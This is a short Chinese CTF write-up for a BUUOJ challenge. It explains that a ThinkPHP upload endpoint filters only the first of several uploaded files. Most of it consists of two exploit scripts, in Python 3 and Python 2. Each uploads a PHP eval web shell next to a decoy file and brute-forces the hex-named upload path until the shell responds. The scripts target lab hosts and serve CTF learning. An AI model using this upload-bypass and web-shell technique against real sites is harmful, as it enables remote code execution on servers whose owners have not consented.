首先确认入口点把我折腾了好一会儿,最后才明白是单模块的ThinkPHP,入口点为/index.php/home/index/upload
经过分析,发现是多文件上传,过滤处理仅处理了一个文件,可以同时上传多个文件直接解出题目,其它文件我们可以用暴力的方法推断出文件路径,具体解题脚本如下
python3(未确认正确性):
import requests
import time
import json
url = "http://33553ba3-3ecf-4551-af99-378c3c2504a6.node3.buuoj.cn"
path = url + "/index.php/home/index/upload"
files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
r = requests.post(path, files=files)
t1 = r.text.split("/")[-1].split(".")[0]
param=json.loads(r.content)
print(param)
t1 = int(t1, 16)
j = t1
while True:
path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
try:
r = requests.get(path,timeout=1)
except:
continue
if r.status_code == 429:#规避过于频繁访问导致的429
time.sleep(0.1)
continue
elif r.status_code != 404:
print(path)
print(r.text)
break
print(j, path, r.status_code)
j -= 1
python2(用这个拿的flag):
import requests
import time
import json
url = "http://443e6467-a00e-47ec-b8cb-6af3da800131.node3.buuoj.cn/"
path = url + "/index.php/home/index/upload"
files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
r = requests.post(path, files=files)
t1 = r.text.split("/")[-1].split(".")[0]
param=json.loads(r.content)
print param
t1 = int(t1, 16)
j = t1
while True:
path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
try:
r = requests.get(path,timeout=1)
except:
continue
if r.status_code == 429:#规避过于频繁访问导致的429
time.sleep(0.1)
continue
elif r.status_code != 404:
print path
print r.text
break
print j, path, r.status_code
j -= 1
网友评论